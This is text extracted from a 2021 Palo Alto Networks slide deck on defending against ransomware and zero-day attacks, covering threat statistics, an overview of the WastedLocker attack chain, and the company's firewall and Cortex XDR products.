Protect Your Company Against Zero Day Attacks
Total Page:16
File Type:pdf, Size:1020Kb
Protect your company against Zero Day attacks Mikkel Bossen | Channel SE May 2021 2020 Top Ransomware Variants ● Ryuk ● Maze (ChaCha) ● Defray777 ● WastedLocker ● GandCrab + REvil ● NetWalker ● DoppelPaymer ● Dharma ● Phobos ● Zepplin https://start.paloaltonetworks.com/unit-42-ransomware-threat-report.html 3 | © 2021 Palo Alto Networks, Inc. All rights reserved. 4 | © 2021 Palo Alto Networks, Inc. All rights reserved. How is Ransomware delivered? 5 | © 2021 Palo Alto Networks, Inc. All rights reserved. Unsecured RDP Connections Unsecured RDP connections. 69% of organizations expose RDP (port 3389). Up 30% https://blog.shodan.io/trends-in-internet-exposure/ Cloud Threat Report * Putting the Sec into DevOps Spring 2020 6 | © 2021 Palo Alto Networks, Inc. All rights reserved. Exposed RDP Adversary Workflow Exposed Adversary Server Stolen Credentials Moves laterally to or other resources Brute Force Extracts Credentials 7 | © 2021 Palo Alto Networks, Inc. All rights reserved. https://cfcs.dk/globalassets/cfcs/dokumenter/rapporter/CFCS-rapport-anatomien-af-maalrettede-ransomwareangreb.pdf Anatomien af målrettede ransomware angreb 8 | © 2021 Palo Alto Networks, Inc. All rights reserved. Security Needs - When Talking about Zero Day Attacks Protection against Vulnerability Exploitation Protection against Execution of Malicious Code Visibility into Attack Surface Segmentation of Infrastructure - Zero Trust Backup and Recovery is Essential 9 | © 2021 Palo Alto Networks, Inc. All rights reserved. Preventing ransomware with machine learning powered NGFW March 2021 Securing Your Transformed Enterprise STRATA PRISMA SECURE SECURE THE ENTERPRISE THE CLOUD Hybrid data center SaaS Internet Perimeter Public cloud Branch & mobile & DevOps SD-WAN DATA LAKE 5G & IoT Secure access CORTEX SECURE THE FUTURE Endpoint Detection & Automation & Network traffic & Threat protection response orchestration behavioral analytics intelligence A Single Platform to Connect and Secure Everything Data Public Internet SaaS Center Cloud Centralized Management Unit 42 Threat Intelligence Intrusion Prevention Malware Analysis Cloud Access Security Secure Web Gateway IoT Security Data Loss Protection SD-WAN & MPLS Cloud-delivered Virtual Containerized Physical Branch HQ Partner Mobile IoT 12 | © 2021 Palo Alto Networks, Inc. All rights reserved. Zero Trust based security rules that support your business Rule usage to guide policy optimization No need to specify ports ... Users Devices Applications All Security Subscriptions One Policy One Unified Console 13 | © 2019 Palo Alto Networks, Inc. All Rights Reserved. NGFW features and subscriptions Cloud Delivered Security Subscriptions PAN-OS 9.0 PAN-OS 8.1 PAN-OS 10.0 PAN-OS 9.1 (PAN-OS 10) Threat URL DNS IoT Data Loss Global WildFire SD-WAN Prevention Filtering Security Security Prevention Protect Prevent all Prevent Ensures files Disrupts Visibility and Consistent VPN service to Networking known threats access to are safe with attacks that protection protection extends NGFW and security across all known and automatic use DNS for of IoT and from capabilities natively traffic in a new malicious detection and command-a OT devices sensitive everywhere integrated single pass websites prevention of nd-control data loss unknown and data malware theft NGFW value keeps increasing through continuous innovation Detect and Prevent New and unknown Threats with WildFire Malware Analysis Bare metal analysis Machine learning Dynamic unpacking Dynamic analysis Network traffic profiling Static analysis Recursive analysis Web Malware, URLs, DNS, C2 Flash Unknowns Scripts Updated within seconds, globally Archive Binaries Protections Prevent Patient Zero with inline ML Documents Partner Network Endpoint Cloud Ecosystem Data collected from a vast Analysis techniques far beyond Automated protection against global community traditional sandboxing multiple attack variants 15 | © 2021 Palo Alto Networks, Inc. All rights reserved. Slashing Our Industry-Leading Time for Distributed Protections Seconds PAN-OS 10.0 Threat detected across Content-Based Protection streamed All customers with 35K+ WF installed base Signature Created in seconds WildFire updated BEFORE With PAN-0S 10.0 Industry-leading Protection streams 5-minute signature to NGFW in generation/ single-digit seconds distribution time 16 | © 2021 Palo Alto Networks, Inc. All rights reserved. Today’s Prevention of Unknown Threats Through Cloud Scale, PAN-OS 9.X Cloud-delivered security services scale prevention Partner DNS Security Integrations Cyber Threat capabilities URL Filtering Alliance Shared intelligence allows WildFire the fastest distribution Data Lake of protections Infinite scale | Trillions of samples analyzed | Fast, high fidelity updates File Protections: 5 min URL URL Protections : 1 min DNS Protections: Instant Industry-leading security subscriptions offer unknown threat protection within minutes or less Prevention of Unknown Threats with Inline Machine Learning, PAN-OS 10 Cloud-delivered security services scale prevention Partner DNS Security Integrations Cyber Threat capabilities URL Filtering Alliance Shared intelligence allows WildFire the fastest distribution Data Lake of protections Infinite scale | Trillions of samples analyzed | Fast, high fidelity updates File Protections: Instant URL URL Protections : Instant DNS Protections: Instant Up to of common file & WildFire Inline ML web-based threats 95% prevented in-line URL Filtering Inline ML Current Trends With TLS 95% of internet traffic today is encrypted 2016 2020 Encrypted traffic Weak protocols will Obtaining certs is Rapid move to is now the norm not be supported easier than ever secure web (HTTPS) 70% of malware campaigns TLS 1.0 and TLS 1.1 can Services like Let’s Encrypt Major browsers mark non-HTTPs sites as in 2020 will use encryption be deprecated anytime offer certificates for free "Not Secure" to conceal malicious and modern protocols (HTTP/2, (Let's Encrypt) activity (Gartner) TLS 1.3) gaining popularity Massive Risks Within Encrypted Traffic Encrypted traffic is now the norm And attackers are taking advantage 70% 95% of internet traffic today is encrypted More than 70% of malware campaigns in 2020 will use some type of encryption to conceal malicious activity, says Gartner 2016 2020 Source: Encrypted Traffic (2016) | Encrypted Traffic (2020) | Encrypted Walwave (Gartner) 20 | © 2021 Palo Alto Networks, Inc. All rights reserved. Deploying Decryption Is Now Easier Than Ever with PAN-OS 10 Mitigate Deploy decryption, Secure cloud security risks worry-free apps quickly Control use of legacy TLS Easily deploy and maintain Secure traffic that uses protocols, insecure ciphers & decryption using purpose-built protocols like TLS 1.3 and incorrectly configured certs troubleshooting & visibility HTTP/2. 21 | © 2021 Palo Alto Networks, Inc. All rights reserved. Secure Encrypted Traffic Without Compromising Privacy Self-signed certs Unsafe TLS versions Untrusted certs Block Weak cipher suites Expired certs Block Dangerous Unsafe Decrypt and Do Not Secure Decrypt Healthcare Government Banking ? Governed by All Else Regulations Return to Security CORTEX XDR Extended detection and response Cortex Vision for Proactive Security Scope and protect your attack surface Prevent Everything you can’t Automate response everything prevent, detect and and get smarter with you can investigate fast every incident 24 | © 2021 Palo Alto Networks, Inc. All rights reserved. Endpoint Protection EPP Our Approach: Breaking down data Endpoint User Detection & EDR UBA Behavior and product silos Response Analytics Prevention, Detection and Response Across Endpoint, Network & Cloud Data NDR Network Detection & Response 25 | © 2021 Palo Alto Networks, Inc. All rights reserved. Cortex XDR Agent Protection Pre-Execution Cloud Post-Execution Reconnaissance Technique-Based Kernel Threat AI-Driven WildFire Malware Malicious Process Ransomware Behavioral Threat Protection Exploit Prevention Protection Intelligence Local Analysis Analysis Prevention Protection Protection Prevents Blocks exploit Protects against Prevents known Prevents Detects advanced Stops script-based Blocks Stops attacks by vulnerability techniques used to exploits targeting threats with intel Unknown threats unknown threats threats ransomware analyzing chains of profiling used by manipulate good or originating from gathered from endpoint events exploit kits applications the kernel WildFire Cross-Platform On and Offline Scheduled and Protection (Win, Protection On-Demand Scanning MacOS, Linux) WastedLocker Attack Lifecycle Web browser Malicious JS from PowerShell Cobalt downloaded ZIP file Strike Loader Ransomware System Utilities Cobalt Strike Execution Beacon 27 | © 2021 Palo Alto Networks, Inc. All rights reserved. Cortex XDR Stops WastedLocker at Every Step Behavioral Threat Behavioral Threat Threat Protection Protection Intelligence Web browser Malicious JS from PowerShell Cobalt downloaded ZIP file Strike Loader Ransomware Behavioral Threat BIOC: Lateral Analytics: Protection Protection Movement C2 Detection Ransomware System Utilities Cobalt Strike Execution Beacon https://pan-unit42.github.io/playbook_viewer/?pb=wastedlocker-ransomware 28 | © 2021 Palo Alto Networks, Inc. All rights reserved. Cortex XDR data sources for detection CORTEX Data Lake Fortinet, Check Point, Cisco, Windows Events, OKTA, Azure AD, PingOne, GCP, AWS, LEEF, Filebeat, Kubernetes Network Endpoint Cloud Third-Party Data Key differentiator: supercharge investigation & response Unified Automated Root Integrated Incident Engine Cause Analysis Response Intelligently group related alerts Reveal the root cause Quick actions to contain into one incident of attacks in one click attacks, isolate hosts or run custom forensics 30 | © 2021 Palo Alto Networks, Inc. All rights reserved. Summary NGFW Cortex XDR Agent Cortex XDR Pro Prevent unknown threats Prevent advanced Speed up faster with Wildfire attacks and investigation and inline ML and ransomware response by SSL decryption combining endpoint and network data Thank You Mikkel Bossen | Channel SE May 2021.